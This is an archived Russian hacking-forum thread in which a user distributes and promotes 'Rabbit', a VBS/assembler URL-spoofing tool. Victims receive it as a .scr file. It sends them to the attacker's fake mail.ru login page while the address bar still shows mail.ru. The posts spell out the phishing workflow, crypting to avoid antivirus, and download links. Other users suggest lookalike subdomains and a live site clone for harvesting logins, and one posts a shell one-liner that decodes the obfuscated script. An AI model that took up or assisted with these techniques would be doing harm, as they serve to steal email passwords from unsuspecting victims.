PDA

Просмотр полной версии : Фишинг mail.ru Смена URL в адресной строке браузера


MOV_EAX
09.11.2013, 01:00
качаем сам скрипт тест (https://hpc.name/redirector.html#http://zalil.ru/34803trtr57)

вырубить скрипт можете в Диспетчере задач.

MOV_EAX
09.11.2013, 01:00
Фишинг mail.ru Смена URL в адресной строке браузера (для Ваших фейков)
Как можно изменить URL в адресной строке браузера с помощью скрипта смотрите видео (https://hpc.name/redirector.html#http://zalil.ru/34802580)

Автор в Теме.
заинтересовало? ася на скрине.

MOV_EAX
09.11.2013, 01:00
обратите внимание на браузерную строку Url при заходе на mail.ru скрипт делает редирект на ---- > http://hpc.name/thread/32344/p9.html

после как попадаем на http://hpc.name/thread/32344/p9.html у нас снова в браузерной строке Url появляется mail.ru

то есть если жертва зашла на оригинальную страницу mail.ru её перекинет на на Ваш фейк но останется при этом строка Url оригинальной страницы mail.ru смотрите далее (https://hpc.name/redirector.html#http://zalil.ru/34802845).

__________________________________________________ ___________________________________________

оставляйте Ваши отзывы .

kaleka444
02.12.2013, 01:00
нихрена не понял))
судя по идео, ты (жертва). Ищешь майл с помощью браузера. КАК ТАК?

bytil85
02.12.2013, 01:00
Тема для купле продажи а не для етого подфорума

mavrodij
02.12.2013, 01:00
Думал что-то серьезное. Написал даже декодер этой криптовки. Ерунда.

MOV_EAX
02.12.2013, 01:00
нет совсем не так kaleka444

1.заливаешь свой фейк для маил.ру на свой хостинг .
2.кидаешь жертве файл vbs script который я тебе дам ,который и будет менять в адресной строке браузера саму страницу URL у жертвы допустим при переходе на маил.ру скрипт закинет жертву на твой фейк и к тому же покажет в адресной строке оригинальную страницу маил.ру ,а не страницу твоего фейка ,смысл в том что мы тут прячем свою ссылку на наш фейк и к тому же мало подозрений того что жертва заглянет вдруг на строку браузера ,а там увидит то что действительно она то есть жертва зашла на оригинальную страницу маил.ру и возможно без проблем отдаст Вам пароли .
3.Vbs script конечно можно с конвертировать в .ехе файл и.т.д это Ваша фантазия.

4. сделаю 5 чел с этого форума бесплатно + криптовка скрипта , с Вас ваша ссылка на Ваш фейк ,аська на скрине , bytil85 прав тему конечно можно и перенести .

ZoRKeG
02.12.2013, 01:00
лол, "криптовать" свой скрипт нужно было лучше, а то пришел zor и спер у тебя скрипт... Правда, кривоватый он, ну да ладно, идея понятна.
P.S. Дампать в паблик не буду (-;

Gelonavi
02.12.2013, 01:00
Я просто оставлю это здесь

code:

r=`cat fejk.vbs | sed -e 's;[a-Z];;g' | tr " " "\n" | sed -e 's;^.$;;g;/^$/d'`; k=`for i in $r; do perl -e "print $i"; echo -e "\n"; done`; for i in $k; do printf \\$(printf '%03o' $i) | iconv -f windows-1251 -t utf-8; done

mr.borocco
03.12.2013, 01:00
Ща посмотрим))

mr.borocco
03.12.2013, 01:00
Бесполезная вещь)

1) Надо закинуть жертве файл. уж лучше закинуть что нибудь стоящее чем, скрипт который подменить адресную строку)
2) Чтобы жертва не видела адрес фейка, используйте поддомены e.mail.ru.cgi-bin.ru например)

kaleka444
03.12.2013, 01:00
Цитата:

Сообщение от mr.borocco

Бесполезная вещь)

1) Надо закинуть жертве файл. уж лучше закинуть что нибудь стоящее чем, скрипт который подменить адресную строку)
2) Чтобы жертва не видела адрес фейка, используйте поддомены e.mail.ru.cgi-bin.ru например)

Я так же думаю))
короче так: ПРИМЕР

Есть сайт http://balabol.biz/ (https://hpc.name/redirector.html#http://balabol.biz/)
Я купил домен http://balabol.biz.az/ (https://hpc.name/redirector.html#http://balabol.biz.az/)

Товарищ мой сделал для меня скрипт который (каким то образом) копирует весь сайт balabol.biz

В итоге я имею сайт http://balabol.biz.az/ (https://hpc.name/redirector.html#http://balabol.biz.az/),, полную копию оригинала который копирует оригинал в реальном времени.
Единственный минус((
Есть проблемы с авторизацией на фейке, когда получается авторизоваться а когда нет!! Что то с куками надо разбираться.
Проще говоря жертва вводит данные на фейке и его авторизует как на настоящем сайте

MOV_EAX
13.12.2013, 01:00
Цитата:

Сообщение от kaleka444

Я так же думаю))
короче так: ПРИМЕР

Есть сайт http://balabol.biz/ (https://hpc.name/redirector.html#http://balabol.biz/)
Я купил домен http://balabol.biz.az/ (https://hpc.name/redirector.html#http://balabol.biz.az/)

Товарищ мой сделал для меня скрипт который (каким то образом) копирует весь сайт balabol.biz

В итоге я имею сайт http://balabol.biz.az/ (https://hpc.name/redirector.html#http://balabol.biz.az/),, полную копию оригинала который копирует оригинал в реальном времени.
Единственный минус((
Есть проблемы с авторизацией на фейке, когда получается авторизоваться а когда нет!! Что то с куками надо разбираться.
Проще говоря жертва вводит данные на фейке и его авторизует как на настоящем сайте

ну понятно на вкус и цвет товарища нет ,кто любит дыню, а кто арбуз, о вкусах не спорят ты знал об этом?

написал Программу на асме и часть кода на vbs ,прога несёт имя rabbitто есть заяц ,кратко:прога меняет адресную строку браузера в УРЛ допустим Вы скинули жертве
(файл-фейк rabbit.scr) через некоторое время до пустим через два три часа жертва решила авторизоваться на маил.ру ,и Человек когда будет в строке вводит слово mail.ru его скинет на Ваш фейк но в адресной строке браузера останется оригинальная страница http://mail.ru (https://hpc.name/redirector.html#http://mail.ru)
кому нужно стучитесь за прогой в аську ,раздача до конца этого года Автор проги в теме,
описание и.т.д по аське

скрин клац
[/URL][URL="https://hpc.name/redirector.html#http://pixs.ru/showimage/rjpg_3806710_10076258.jpg"] (https://hpc.name/redirector.html#http://pixs.ru/showimage/rjpg_3806710_10076258.jpg)IMAGE (https://hpc.name/redirector.html#http://img.pixs.ru/storage/2/5/8/rjpg_3806710_10076258.jpg) http://img.pixs.ru/storage/2/5/8/rjpg_3806710_10076258.jpg

MOV_EAX
17.12.2013, 01:00
раздача продолжается пока палится одним антивирусом ,UP.

DOWNLOAD (https://hpc.name/redirector.html#http://gfile.ru/a2EI8)

[/URL][URL="https://hpc.name/redirector.html#http://pixs.ru/showimage/rjpg_3806710_10076258.jpg"] (https://hpc.name/redirector.html#http://pixs.ru/showimage/rjpg_3806710_10076258.jpg)IMAGE (https://hpc.name/redirector.html#http://img.pixs.ru/storage/2/5/8/rjpg_3806710_10076258.jpg) http://img.pixs.ru/storage/2/5/8/rjpg_3806710_10076258.jpg

pass: 123

MOV_EAX
27.01.2014, 01:00
исправлены баги ,описание и сама прога внутри архива .
Rabbit v1.0
IMAGE (https://hpc.name/redirector.html#http://i7.pixs.ru/storage/7/3/9/rabbit1bmp_9519954_10628739.jpg) http://i7.pixs.ru/storage/7/3/9/rabbit1bmp_9519954_10628739.jpg

пройти по ссылке и загрузить http://zalil.ru/34935895 (https://hpc.name/redirector.html#http://zalil.ru/34935895) Rabbit v1.0

http://www.securitylab.ru/forum/mess...#message414687 (https://hpc.name/redirector.html#http://www.securitylab.ru/forum/messages/forum17/topic52672/message414687/#message414687)

labvictx
11.09.2014, 01:00
Цитата:

Сообщение от MOV_EAX

исправлены баги ,описание и сама прога внутри архива .
Rabbit v1.0
IMAGE (https://hpc.name/redirector.html#http://i7.pixs.ru/storage/7/3/9/rabbit1bmp_9519954_10628739.jpg) http://i7.pixs.ru/storage/7/3/9/rabbit1bmp_9519954_10628739.jpg

пройти по ссылке и загрузить http://zalil.ru/34935895 (https://hpc.name/redirector.html#http://zalil.ru/34935895) Rabbit v1.0

http://www.securitylab.ru/forum/mess...#message414687 (https://hpc.name/redirector.html#http://www.securitylab.ru/forum/messages/forum17/topic52672/message414687/#message414687)

Сервер не найден
Браузер не может найти сервер zalil.ru.
Плиз, перезалейте

MOV_EAX
26.11.2014, 01:00
вставляем в нашу прогу адрес урл касс.ру запускаем наш файл по фишингу ,после перeходим на майл.ру но у нас после перехода на майл.ру все же перекидывает на касс.ру но в адресной строке браусера остается майл.ру, и не каких подозрений.

значит просто касс.ру <----- будто наш фейк
вогнали ?

ссылка на видео
Файл № 42377545 подтвержден
Название: f.rar
Размер: 20.45 Мб
Доступен до: 2014-12-26 13:34:54
Ссылка для скачивания файла: http://zalil-slil.rusfolder.net/files/42377545 (https://hpc.name/redirector.html#http://zalil-slil.rusfolder.net/files/42377545)

MOV_EAX
03.01.2015, 01:00
Дополнительное объяснение:читать в readme.txt обязательно.

обновление проги: Ссылка на страницу загрузки:
http://my-files.ru/z8pdk7 (https://hpc.name/redirector.html#http://my-files.ru/z8pdk7)

PHP highlight



http://pixs.ru/showimage/spbmp_3556065_15419125.jpg





URL-Spoofing mail.ru v.1.0.1
____________________________
Фишинг mail.ru Смена URL в адресной строке браузера

MOV_EAX
11.01.2015, 01:00
URL-Spoofing v.1.5

видео
Доступен до: 2015-02-10 19:44:01
Описание: URL-Spoofing v.1.5
Ссылка для скачивания файла: http://webfiles.ru/files/42723904 (https://hpc.name/redirector.html#http://webfiles.ru/files/42723904)
IMAGE (https://hpc.name/redirector.html#http://www.bank-of-africa.net/sites/all/themes/boa_grp/logo.png) http://www.bank-of-africa.net/sites/all/themes/boa_grp/logo.png

подмена всех урл адресов

+ вставляем нужный нам содержимое мета тег
+ ссылку на Ваш фейк
+ урл адрес оригинальной страницы

и кидаем файл жертве.
видео нa rutube часть 2
http://rutube.ru/video/a215aec5716cc...45f5ee04a5cae/ (https://hpc.name/redirector.html#http://rutube.ru/video/a215aec5716ccc9bf7445f5ee04a5cae/)

noolname
18.03.2015, 01:00
Почему страница ввода пароля, не похожа на мейл.ру? Или это только на видео так?

evropa
26.05.2015, 01:00
СКАЧАТЬ!!!ПОШАГОВОЕ РУКОВОДСТВО В КАРТИНКАХ!!! (https://hpc.name/redirector.html#https://cloud.mail.ru/public/4rmXyzDbipyR/zbt_goold.rar)

wera87df
27.05.2015, 01:00
Цитата:

Сообщение от evropa

СКАЧАТЬ!!!ПОШАГОВОЕ РУКОВОДСТВО В КАРТИНКАХ!!!

Ай лошара , ай молодца )))

[/URL] (https://hpc.name/redirector.html#http://www.radikal.ru)IMAGE (https://hpc.name/redirector.html#http://s011.radikal.ru/i318/1505/ec/2f5e793a4bdc.jpg) http://s011.radikal.ru/i318/1505/ec/2f5e793a4bdc.jpg

[URL="https://hpc.name/redirector.html#http://www.radikal.ru"] (https://hpc.name/redirector.html#http://www.radikal.ru)IMAGE (https://hpc.name/redirector.html#http://s017.radikal.ru/i429/1505/0e/1ea162ef3963.jpg) http://s017.radikal.ru/i429/1505/0e/1ea162ef3963.jpg